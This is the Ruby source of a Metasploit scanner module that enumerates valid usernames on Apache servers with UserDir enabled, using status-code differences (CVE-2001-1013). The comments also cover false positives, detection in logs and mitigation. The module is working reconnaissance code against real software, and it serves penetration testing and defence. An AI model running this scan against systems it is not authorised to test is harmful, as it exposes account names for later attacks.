rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/apache_userdir_enum.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
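# Auxiliary scanner for the Apache mod_userdir username disclosure
# (CVE-2001-1013): the server answers differently for "~name/" depending on
# whether the account exists, so response codes reveal valid usernames.
#
# What the check relies on, as implemented below:
#   * one GET per candidate name to "<TARGETURI>~<name>/"
#   * HTTP 200 or 403 is recorded as "user exists"; any other code is not
#
# NOTE(review): a server that answers 200 or 403 for every "~name/" path
# (catch-all page, blanket deny rule) would make every candidate look valid.
# The module does not baseline against a known-absent name, so results from
# such a host should be treated as unconfirmed.
#
# Defender view: the scan shows up in access logs as a burst of GET requests
# for "/~<name>/" paths from one source. The disclosure disappears when
# UserDir is turned off (Apache "UserDir disabled") or when existing and
# missing accounts produce the same response.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  # Declares module metadata and options. AuthBrute is mixed in only for its
  # username iteration, so every password-related option is deregistered.
  def initialize
    super(
      'Name' => 'Apache "mod_userdir" User Enumeration',
      'Description' => %q{Apache with the UserDir directive enabled generates different error
      codes when a username exists and there is no public_html directory and when the username
      does not exist, which could allow remote attackers to determine valid usernames on the
      server.},
      'Author' => [
        'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
      ],
      'References' => [
        ['BID', '3335'],
        ['CVE', '2001-1013'],
        ['OSVDB', '637'],
      ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
        OptPath.new('USER_FILE', [
          true, "File containing users, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
        ]),
      ]
    )

    # No authentication is attempted, so the password options inherited from
    # AuthBrute have no meaning here.
    deregister_options(
      'PASSWORD',
      'PASS_FILE',
      'USERPASS_FILE',
      'STOP_ON_SUCCESS',
      'BLANK_PASSWORDS',
      'USER_AS_PASS'
    )
  end

  # Scans one host: probes every candidate username, then prints a summary
  # and stores the confirmed names as a single 'users' note on the service.
  #
  # @param ip [String] address supplied by the Scanner mixin (not read here;
  #   rhost/rport are used instead)
  def run_host(ip)
    # Keyed by username so a name yielded more than once is stored once.
    @users_found = {}

    # Only the username half of each yielded pair is used.
    each_user_pass do |user, _pass|
      do_login(user)
    end

    if @users_found.empty?
      print_status("#{full_uri} - No users found.")
    else
      print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
      report_note(
        :host => rhost,
        :port => rport,
        :proto => 'tcp',
        :sname => (ssl ? 'https' : 'http'),
        :type => 'users',
        :data => { :users => @users_found.keys.join(", ") }
      )
    end
  end

  # Requests "<TARGETURI>~<user>/" and records the user in @users_found when
  # the server answers 200 or 403.
  #
  # Connection-level failures do not abort the scan; they are reported in
  # verbose mode so a host that stopped answering is distinguishable from a
  # host with no matching users.
  #
  # @param user [String] candidate account name
  def do_login(user)
    vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
    uri = normalize_uri(target_uri.path)
    payload = "#{uri}~#{user}/"

    # The bang variant follows redirects; 20 is passed as the request timeout.
    res = send_request_cgi!(
      {
        'method' => 'GET',
        'uri' => payload,
        'ctype' => 'text/plain'
      },
      20
    )

    # No response object: nothing to classify for this name.
    return unless res

    # 200: the user directory was served. 403: the request was refused rather
    # than reported missing. Both are treated as evidence the account exists.
    if [200, 403].include?(res.code)
      print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
      @users_found[user] = :reported
    else
      vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE => e
    # Previously swallowed silently; surfaced in verbose output only, so the
    # default output and the scan flow are unchanged.
    vprint_error("#{full_uri} - Apache UserDir: request for '#{user}' failed: #{e.class} #{e.message}")
  end
end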